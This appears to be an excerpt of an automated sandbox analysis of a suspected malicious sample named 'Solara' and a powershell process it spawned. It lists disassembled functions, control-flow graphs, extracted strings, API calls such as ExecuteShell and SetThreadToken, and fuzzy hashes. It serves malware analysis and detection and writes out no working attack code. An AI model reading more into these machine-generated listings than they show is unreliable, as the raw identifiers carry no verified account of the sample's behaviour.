                          • Associated: 00000000.00000002.2061670373.0000000001802000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2105218477.00000000018E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2105218477.0000000001929000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Solara.jbxd
                          Similarity
                          • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                          • String ID: %s\%s$& @$1 @$D^:$D^:$`!@$e!@$m!@
                          • API String ID: 3236948872-1270294868
                          • Opcode ID: ce750fbac2cb14ad0dc9064ff98aa15b76953c15100595a9c4aac367c16c266a
                          • Instruction ID: 0f4fa566833f11a23764da638e14c3889644c3d1e2dc9040f1fa2ab0d00c82ab
                          • Opcode Fuzzy Hash: ce750fbac2cb14ad0dc9064ff98aa15b76953c15100595a9c4aac367c16c266a
                          • Instruction Fuzzy Hash: 94914EF0E001089BDB14DBACDC45B9E77F9EB48309F04417AF119FB391E639AA458B69
                          Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 28 401000-40102e malloc 29 401031-401039 28->29 30 401087-40108b 29->30 31 40103f-401085 29->31 31->29
                          APIs
                          Strings
                          • +._c_bha,z_&[vl/hm9(f<6>t&xw!82c, xrefs: 0040106E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2061631634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2061566778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000001802000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2105218477.00000000018E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2105218477.0000000001929000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Solara.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: +._c_bha,z_&[vl/hm9(f<6>t&xw!82c
                          • API String ID: 2803490479-2406027873
                          • Opcode ID: 940754db854be8e9f0d654b819481c3bfaac98b721c30c9ad94932804922e4ad
                          • Instruction ID: d2f3ec46e71ac81c28e11c01a8ed58905d811356681e848a8ba007acd0030eff
                          • Opcode Fuzzy Hash: 940754db854be8e9f0d654b819481c3bfaac98b721c30c9ad94932804922e4ad
                          • Instruction Fuzzy Hash: 8F110C70A05648EFCB04CFACD4907ADBBF1AF49304F1480AAE856E7391D635AE41DB45
                          Function 00401493 Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 34 401493-4014e6 call 4013ec call 40108c call 401448
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2061631634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2061566778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000001802000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2105218477.00000000018E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2105218477.0000000001929000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Solara.jbxd
                          Similarity
                          • API ID: memset$ExecuteShell
                          • String ID: D`:vD`:v$D`:vD`:v
                          • API String ID: 3137921467-3916433284
                          • Opcode ID: 2406d0377fc08cd9885031446e657cb46bb0b72f9a716d35873baa4fd364bde6
                          • Instruction ID: b70dc084ebc81cf843c896ce4f36b9c1a97f1ce35968409f521680236884300f
                          • Opcode Fuzzy Hash: 2406d0377fc08cd9885031446e657cb46bb0b72f9a716d35873baa4fd364bde6
                          • Instruction Fuzzy Hash: A0F098B9A01209AFCB40DFA8D986D8E77F8AB49308F108065F948EB354D674EA448B65

                          Execution Graph

                          Execution Coverage:5.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph 22056 8bf7c60 22057 8bf7ca3 SetThreadToken 22056->22057 22058 8bf7cd1 22057->22058

                          Executed Functions

                          Function 04BFB570 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 486 4bfb570-4bfb589 487 4bfb58e-4bfb8d5 call 4bfad9c 486->487 488 4bfb58b 486->488 488->487
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: +Ym^$Xm^
                          • API String ID: 0-2481550747
                          • Opcode ID: 31ab029a0260ef41e31d30eb9a2aba5f01e16962008ac79392afb819279fdb21
                          • Instruction ID: a1070276fad3d228e1c4281c2403566b323a6ad2fa20814c9fd6acc7e7fa4d44
                          • Opcode Fuzzy Hash: 31ab029a0260ef41e31d30eb9a2aba5f01e16962008ac79392afb819279fdb21
                          • Instruction Fuzzy Hash: B991BF74B007149BEB19DFB48A105AF77F7EF84600B00892DD15AAB398DF74AE098BD5
                          Function 07A82308 Relevance: 13.1, Strings: 10, Instructions: 646COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$JPl$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-3034988559
                          • Opcode ID: 604c3009d27c983359ad485edd813eaebfa19dbf5c6e3f5ffacb616c5654bc8a
                          • Instruction ID: 19bfe93a1b2f94faf52a50cd429b1c6d93b2241093ecf2598d78fac6d2a4896e
                          • Opcode Fuzzy Hash: 604c3009d27c983359ad485edd813eaebfa19dbf5c6e3f5ffacb616c5654bc8a
                          • Instruction Fuzzy Hash: CF2247B1B002059FCB64AB69C851BBABBE6FFC5311F04807AD925CB291DB35C945C7B2
                          Function 07A83CE8 Relevance: 5.6, Strings: 4, Instructions: 591COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 206 7a83ce8-7a83d0d 208 7a83f00-7a83f1e 206->208 209 7a83d13-7a83d18 206->209 217 7a83f28-7a83f2b 208->217 218 7a83f20-7a83f22 208->218 210 7a83d1a-7a83d20 209->210 211 7a83d30-7a83d34 209->211 213 7a83d22 210->213 214 7a83d24-7a83d2e 210->214 215 7a83d3a-7a83d3c 211->215 216 7a83eb0-7a83eba 211->216 213->211 214->211 221 7a83d4c 215->221 222 7a83d3e-7a83d4a 215->222 219 7a83ec8-7a83ece 216->219 220 7a83ebc-7a83ec5 216->220 223 7a83f2c-7a83f4a 217->223 218->223 224 7a83f24-7a83f26 218->224 225 7a83ed0-7a83ed2 219->225 226 7a83ed4-7a83ee0 219->226 228 7a83d4e-7a83d50 221->228 222->228 229 7a840ce-7a840e6 223->229 230 7a83f50-7a83f55 223->230 224->217 231 7a83ee2-7a83efd 225->231 226->231 228->216 232 7a83d56-7a83d75 228->232 243 7a840e8-7a840ec 229->243 244 7a840f0-7a84112 229->244 233 7a83f6d-7a83f71 230->233 234 7a83f57-7a83f5d 230->234 260 7a83d85 232->260 261 7a83d77-7a83d83 232->261 240 7a84080-7a8408a 233->240 241 7a83f77-7a83f79 233->241 236 7a83f5f 234->236 237 7a83f61-7a83f6b 234->237 236->233 237->233 245 7a8408c-7a84094 240->245 246 7a84097-7a8409d 240->246 247 7a83f89 241->247 248 7a83f7b-7a83f87 241->248 243->244 254 7a84228-7a8424a 244->254 255 7a84118-7a8411d 244->255 251 7a8409f-7a840a1 246->251 252 7a840a3-7a840af 246->252 249 7a83f8b-7a83f8d 247->249 248->249 249->240 259 7a83f93-7a83fb2 249->259 262 7a840b1-7a840cb 251->262 252->262 275 7a8424c-7a84253 254->275 276 7a84254-7a8425d 254->276 257 7a8411f-7a84125 255->257 258 7a84135-7a84139 255->258 263 7a84129-7a84133 257->263 264 7a84127 257->264 267 7a841da-7a841e4 258->267 268 7a8413f-7a84141 258->268 296 7a83fc2 259->296 297 7a83fb4-7a83fc0 259->297 265 7a83d87-7a83d89 260->265 261->265 263->258 264->258 265->216 271 7a83d8f-7a83d96 265->271 277 7a841f1-7a841f7 267->277 278 7a841e6-7a841ee 267->278 272 7a84151 268->272 273 7a84143-7a8414f 268->273 271->208 280 7a83d9c-7a83da1 271->280 281 7a84153-7a84155 272->281 273->281 275->276 282 7a8428b-7a84295 276->282 283 7a8425f-7a84281 276->283 284 7a841f9-7a841fb 277->284 285 7a841fd-7a84209 277->285 289 7a83db9-7a83dc8 280->289 290 7a83da3-7a83da9 280->290 281->267 292 7a8415b-7a8415d 281->292 286 7a8429f-7a842a5 282->286 287 7a84297-7a8429c 282->287 322 7a84283-7a84288 283->322 323 7a842d5-7a842fe 283->323 293 7a8420b-7a84225 284->293 285->293 294 7a842ab-7a842b7 286->294 295 7a842a7-7a842a9 286->295 289->216 319 7a83dce-7a83dec 289->319 298 7a83dab 290->298 299 7a83dad-7a83db7 290->299 300 7a8415f-7a84165 292->300 301 7a84177-7a8417e 292->301 307 7a842b9 294->307 295->307 308 7a83fc4-7a83fc6 296->308 297->308 298->289 299->289 309 7a84169-7a84175 300->309 310 7a84167 300->310 305 7a84180-7a84186 301->305 306 7a84196-7a841d7 301->306 312 7a84188 305->312 313 7a8418a-7a84194 305->313 321 7a842be-7a842d2 307->321 308->240 316 7a83fcc-7a84003 308->316 309->301 310->301 312->306 313->306 337 7a8401d-7a84024 316->337 338 7a84005-7a8400b 316->338 319->216 332 7a83df2-7a83e17 319->332 335 7a8432d-7a84335 323->335 336 7a84300-7a84326 323->336 332->216 353 7a83e1d-7a83e24 332->353 335->321 349 7a84337-7a8435c 335->349 336->335 343 7a8403c-7a8407d 337->343 344 7a84026-7a8402c 337->344 340 7a8400d 338->340 341 7a8400f-7a8401b 338->341 340->337 341->337 346 7a8402e 344->346 347 7a84030-7a8403a 344->347 346->343 347->343 354 7a8435e-7a8437b 349->354 355 7a84395-7a8439f 349->355 358 7a83e6a-7a83e9d 353->358 359 7a83e26-7a83e41 353->359 367 7a8437d-7a8438f 354->367 368 7a843e5-7a843ea 354->368 356 7a843a8-7a843ae 355->356 357 7a843a1-7a843a5 355->357 361 7a843b0-7a843b2 356->361 362 7a843b4-7a843c0 356->362 379 7a83ea4-7a83ead 358->379 370 7a83e5b-7a83e5f 359->370 371 7a83e43-7a83e49 359->371 364 7a843c2-7a843e2 361->364 362->364 367->355 368->367 377 7a83e66-7a83e68 370->377 375 7a83e4b 371->375 376 7a83e4d-7a83e59 371->376 375->370 376->370 377->379
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$4'jq$4'jq
                          • API String ID: 0-4000621977
                          • Opcode ID: cd5bdf4d7dd17c5015605db039194cd8c9af4d5037a1c58d375d622cb52552aa
                          • Instruction ID: b5de01c97c79f195284e50d89c2f599ac24136dcf98deac6f11e2d44b1436964
                          • Opcode Fuzzy Hash: cd5bdf4d7dd17c5015605db039194cd8c9af4d5037a1c58d375d622cb52552aa
                          • Instruction Fuzzy Hash: 5A1277B1704352CFCB51AB28C811B6BBBB2AFD5710F14846AD921CF291DB36DD46C7A2
                          Function 07A817B8 Relevance: 2.8, Strings: 2, Instructions: 342COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 385 7a817b8-7a817da 386 7a81969-7a81971 385->386 387 7a817e0-7a817e5 385->387 395 7a818fa-7a81905 386->395 396 7a81973-7a819b5 386->396 388 7a817fd-7a81801 387->388 389 7a817e7-7a817ed 387->389 393 7a81914-7a8191e 388->393 394 7a81807-7a8180b 388->394 390 7a817ef 389->390 391 7a817f1-7a817fb 389->391 390->388 391->388 397 7a8192c-7a81932 393->397 398 7a81920-7a81929 393->398 399 7a8184b 394->399 400 7a8180d-7a8181e 394->400 424 7a8190a-7a81911 395->424 403 7a819bb-7a819c0 396->403 404 7a81b04-7a81b25 396->404 405 7a81938-7a81944 397->405 406 7a81934-7a81936 397->406 401 7a8184d-7a8184f 399->401 400->386 416 7a81824-7a81829 400->416 401->393 408 7a81855-7a81859 401->408 409 7a819d8-7a819dc 403->409 410 7a819c2-7a819c8 403->410 431 7a81aac-7a81ab1 404->431 432 7a81b27-7a81b34 404->432 412 7a81946-7a81966 405->412 406->412 408->393 413 7a8185f-7a81863 408->413 418 7a819e2-7a819e4 409->418 419 7a81ab4-7a81abe 409->419 414 7a819ca 410->414 415 7a819cc-7a819d6 410->415 425 7a81865-7a8186e 413->425 426 7a81886 413->426 414->409 415->409 427 7a8182b-7a81831 416->427 428 7a81841-7a81849 416->428 429 7a819f4 418->429 430 7a819e6-7a819f2 418->430 422 7a81acc-7a81ad2 419->422 423 7a81ac0-7a81ac9 419->423 440 7a81ad8-7a81ae4 422->440 441 7a81ad4-7a81ad6 422->441 435 7a81870-7a81873 425->435 436 7a81875-7a81882 425->436 438 7a81889-7a818ab 426->438 442 7a81833 427->442 443 7a81835-7a8183f 427->443 428->401 439 7a819f6-7a819f8 429->439 430->439 433 7a81b44 432->433 434 7a81b36-7a81b42 432->434 444 7a81b46-7a81b48 433->444 434->444 448 7a81884 435->448 436->448 438->424 439->419 446 7a819fe-7a81a16 439->446 447 7a81ae6-7a81b01 440->447 441->447 442->428 443->428 450 7a81b4a-7a81b50 444->450 451 7a81b7c-7a81b86 444->451 464 7a81a18-7a81a1e 446->464 465 7a81a30-7a81a34 446->465 448->438 455 7a81b5e-7a81b79 450->455 456 7a81b52-7a81b54 450->456 459 7a81b88-7a81b8d 451->459 460 7a81b90-7a81b96 451->460 456->455 461 7a81b98-7a81b9a 460->461 462 7a81b9c-7a81ba8 460->462 470 7a81baa-7a81bc1 461->470 462->470 466 7a81a20 464->466 467 7a81a22-7a81a2e 464->467 472 7a81a3a-7a81a41 465->472 466->465 467->465 475 7a81a48-7a81aa5 472->475 476 7a81a43-7a81a46 472->476 477 7a81aaa 475->477 476->477 477->431
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: El$El
                          • API String ID: 0-3664010398
                          • Opcode ID: abfe71a9677a5b77868a8de68a87c2dd1b2b89d4c84bb973da0a7cfd8542c382
                          • Instruction ID: 3f8f1b386461c28546a29e5f06b5fef9504c96cf02672e9c13ebb6d5484d7dc4
                          • Opcode Fuzzy Hash: abfe71a9677a5b77868a8de68a87c2dd1b2b89d4c84bb973da0a7cfd8542c382
                          • Instruction Fuzzy Hash: B5B126B2B0420A9FCB54EB68D800AAAFBE6EFC5211F14C07ED465CB251DB31DD46C7A1
                          Function 08BF7C5A Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 550 8bf7c5a-8bf7c9b 551 8bf7ca3-8bf7ccf SetThreadToken 550->551 552 8bf7cd8-8bf7cf5 551->552 553 8bf7cd1-8bf7cd7 551->553 553->552
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2190328303.0000000008BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8bf0000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: 56f1e4c9bd03e4ef8178d7673d73f8297660deecc3fa2cdd53c446fcf85217c8
                          • Instruction ID: f5b54cba4b5a46fe9dd57cf465606717d23318e9270376ea555d5a052a426f0f
                          • Opcode Fuzzy Hash: 56f1e4c9bd03e4ef8178d7673d73f8297660deecc3fa2cdd53c446fcf85217c8
                          • Instruction Fuzzy Hash: 1A1116B59002888FCB10DF9AC588B9EFFF4AF49320F148499D559A7350C774A948CFA5
                          Function 08BF7C60 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 556 8bf7c60-8bf7ccf SetThreadToken 558 8bf7cd8-8bf7cf5 556->558 559 8bf7cd1-8bf7cd7 556->559 559->558
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2190328303.0000000008BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8bf0000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: c48d59d81632236455c5295f8a09afab59f9c2a452f0e481455b40e82717492d
                          • Instruction ID: 6a81839aa18c82da6d31ebc1248f215d44187b0b2bff2c710426319b1e5a9206
                          • Opcode Fuzzy Hash: c48d59d81632236455c5295f8a09afab59f9c2a452f0e481455b40e82717492d
                          • Instruction Fuzzy Hash: D911F5B59002488FCB10DF9AC988B9EFBF8EB48324F148459D519A7350C778A944CFA5
                          Function 04BF70A8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 562 4bf70a8-4bf70c7 563 4bf71cd-4bf720b 562->563 564 4bf70cd-4bf70d0 562->564 592 4bf70d2 call 4bf775f 564->592 593 4bf70d2 call 4bf7744 564->593 565 4bf70d8-4bf70ea 567 4bf70ec 565->567 568 4bf70f6-4bf710b 565->568 567->568 574 4bf7196-4bf71af 568->574 575 4bf7111-4bf7121 568->575 580 4bf71ba 574->580 581 4bf71b1 574->581 576 4bf712d-4bf7138 575->576 577 4bf7123 575->577 590 4bf713b call 4bfc000 576->590 591 4bf713b call 4bfbff0 576->591 577->576 580->563 581->580 583 4bf7141-4bf7145 584 4bf7147-4bf7157 583->584 585 4bf7185-4bf7190 583->585 586 4bf7159-4bf7171 584->586 587 4bf7173-4bf717d 584->587 585->574 585->575 586->585 587->585 590->583 591->583 592->565 593->565
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: 5ab3f0c18bdfd717d7ccfd423cbeced329f566b0712d3e805f3b126b877fa39f
                          • Instruction ID: 7d89c82bfaa2447d344bfd2b3b6e80cb9b0bfcc5d3378660edd52ca52ce6b8c3
                          • Opcode Fuzzy Hash: 5ab3f0c18bdfd717d7ccfd423cbeced329f566b0712d3e805f3b126b877fa39f
                          • Instruction Fuzzy Hash: 71412B34B042048FDB18DF69C858AA9BBF2EF8D311F1444D9D946AB391DE31ED06CB61
                          Function 04BFAE08 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 594 4bfae08-4bfae99 601 4bfaea3-4bfaeae 594->601 613 4bfaeb1 call 4bfaf50 601->613 614 4bfaeb1 call 4bfaf40 601->614 602 4bfaeb7-4bfaf3c call 4bf911c 613->602 614->602
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: [m^
                          • API String ID: 0-1166968519
                          • Opcode ID: e15d62b3166fadcbce5c8ceb0f33d8ee9def3cafa4263035acdfb2538802635d
                          • Instruction ID: 578e5dcdf5d416d858632a00d1db45fe8c9ab2eb2fdbbf57fe935b8a06a33b0b
                          • Opcode Fuzzy Hash: e15d62b3166fadcbce5c8ceb0f33d8ee9def3cafa4263035acdfb2538802635d
                          • Instruction Fuzzy Hash: 9E3160B8A003059FD704EF64D954AAE7BB6EF88300F1184A9D215AB3A5CA38AD458F50
                          Function 04BFB078 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 615 4bfb078-4bfb081 call 4bfaa64 617 4bfb086-4bfb08a 615->617 618 4bfb08c-4bfb099 617->618 619 4bfb09a-4bfb135 617->619 625 4bfb13e-4bfb15b 619->625 626 4bfb137-4bfb13d 619->626 626->625
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (&jq
                          • API String ID: 0-3222446104
                          • Opcode ID: bee1d1f60fa34f7fff21a9b778cbc3d48eba911d0e26f4f98b616fad9d52df07
                          • Instruction ID: b1890e7abbd8bcff5506d8d9d82a4142d58bf2a8cf772e0cfce855fdd3013265
                          • Opcode Fuzzy Hash: bee1d1f60fa34f7fff21a9b778cbc3d48eba911d0e26f4f98b616fad9d52df07
                          • Instruction Fuzzy Hash: 8121AE71A043588FCB14DFAED844BAFBFF5EB89720F14846AD518A7340CA74A9058BA5
                          Function 04BFAE18 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 629 4bfae18-4bfaeae 648 4bfaeb1 call 4bfaf50 629->648 649 4bfaeb1 call 4bfaf40 629->649 637 4bfaeb7-4bfaf3c call 4bf911c 648->637 649->637
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: [m^
                          • API String ID: 0-1166968519
                          • Opcode ID: 97b569f359cc86eddc271a73774adb73c795dd930d777c122601078ea7b7b742
                          • Instruction ID: 33b160449a41290bc621bd01de63e79d083db2a4624054e232fc6966826f6f4f
                          • Opcode Fuzzy Hash: 97b569f359cc86eddc271a73774adb73c795dd930d777c122601078ea7b7b742
                          • Instruction Fuzzy Hash: C8312178A00205AFDB04EFA4D954AEE77B6EF88300F108469D615AB394DB35ED558F50
                          Function 04BFDD68 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 650 4bfdd68-4bfdd74 651 4bfdded-4bfdf16 650->651 652 4bfdd76-4bfdd8d 650->652 655 4bfdd8f 652->655 656 4bfdd96-4bfdda8 652->656 655->656 660 4bfddaa call 4bfddb9 656->660 661 4bfddaa call 4bfddc8 656->661 662 4bfddaa call 4bfdd68 656->662 659 4bfddb0-4bfddb3 660->659 661->659 662->659
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: K.m^
                          • API String ID: 0-4201954797
                          • Opcode ID: ab3059ec344e0721a1c8b77307cd10157a8e75028f2e4dbb6114c2887e390556
                          • Instruction ID: 08c6a192e6bba24a505f92bfa5a685fb70853f22e9e625813d38c56b86ac0ed3
                          • Opcode Fuzzy Hash: ab3059ec344e0721a1c8b77307cd10157a8e75028f2e4dbb6114c2887e390556
                          • Instruction Fuzzy Hash: DEF0E9357057106BC7169619AD14AEA7B6DDFC62B1B01489BD24ECB191DE20A80D87A1
                          Function 04BFDD78 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 663 4bfdd78-4bfdd8d 665 4bfdd8f 663->665 666 4bfdd96 663->666 665->666 667 4bfdd9e-4bfdda8 666->667 669 4bfddaa call 4bfddb9 667->669 670 4bfddaa call 4bfddc8 667->670 671 4bfddaa call 4bfdd68 667->671 668 4bfddb0-4bfddb3 669->668 670->668 671->668
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: K.m^
                          • API String ID: 0-4201954797
                          • Opcode ID: e55c730da23ce86238b9596a5f3a349c46d259de6796540292b546303698eb33
                          • Instruction ID: 984e10ebfa8d952f7575eaba27c0264aaa7dad3ee47ca2e71486281eff1cd2a7
                          • Opcode Fuzzy Hash: e55c730da23ce86238b9596a5f3a349c46d259de6796540292b546303698eb33
                          • Instruction Fuzzy Hash: E7E0C236300B14178315AA1EA80099FB7EEDFC96B1300442EE15ECB340DF64FC0A87D6
                          Function 04BF29F0 Relevance: .2, Instructions: 208COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 835 4bf29f0-4bf2a1e 836 4bf2af5-4bf2b37 835->836 837 4bf2a24-4bf2a3a 835->837 841 4bf2b3d-4bf2b56 836->841 842 4bf2c51-4bf2c61 836->842 838 4bf2a3f-4bf2a52 837->838 839 4bf2a3c 837->839 838->836 846 4bf2a58-4bf2a65 838->846 839->838 844 4bf2b5b-4bf2b69 841->844 845 4bf2b58 841->845 844->842 852 4bf2b6f-4bf2b79 844->852 845->844 848 4bf2a6a-4bf2a7c 846->848 849 4bf2a67 846->849 848->836 853 4bf2a7e-4bf2a88 848->853 849->848 854 4bf2b7b-4bf2b7d 852->854 855 4bf2b87-4bf2b94 852->855 856 4bf2a8a-4bf2a8c 853->856 857 4bf2a96-4bf2aa6 853->857 854->855 855->842 858 4bf2b9a-4bf2baa 855->858 856->857 857->836 859 4bf2aa8-4bf2ab2 857->859 860 4bf2baf-4bf2bbd 858->860 861 4bf2bac 858->861 862 4bf2ab4-4bf2ab6 859->862 863 4bf2ac0-4bf2af4 859->863 860->842 865 4bf2bc3-4bf2bd3 860->865 861->860 862->863 867 4bf2bd8-4bf2be5 865->867 868 4bf2bd5 865->868 867->842 871 4bf2be7-4bf2bf7 867->871 868->867 872 4bf2bfc-4bf2c08 871->872 873 4bf2bf9 871->873 872->842 875 4bf2c0a-4bf2c24 872->875 873->872 876 4bf2c29 875->876 877 4bf2c26 875->877 878 4bf2c2e-4bf2c38 876->878 877->876 879 4bf2c3d-4bf2c50 878->879
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2c48f6df3761f73d606477aeaf37ecabfdef2852a5c745bc2a6ce566a06cc4d1
                          • Instruction ID: d546287f7f1bbe0e8d3c359e067c8199a7105eda78b6478fc68d2ec4c9a172d8
                          • Opcode Fuzzy Hash: 2c48f6df3761f73d606477aeaf37ecabfdef2852a5c745bc2a6ce566a06cc4d1
                          • Instruction Fuzzy Hash: 98917F74A00205CFCB19CF59C9949AEFBB1FF89310B248599D919AB3A5C736FC91CB90
                          Function 04BFBB90 Relevance: .2, Instructions: 157COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b555e52f8d126596c0e677aa63d3c1243c4772205ef02d02bb739b724165fc1
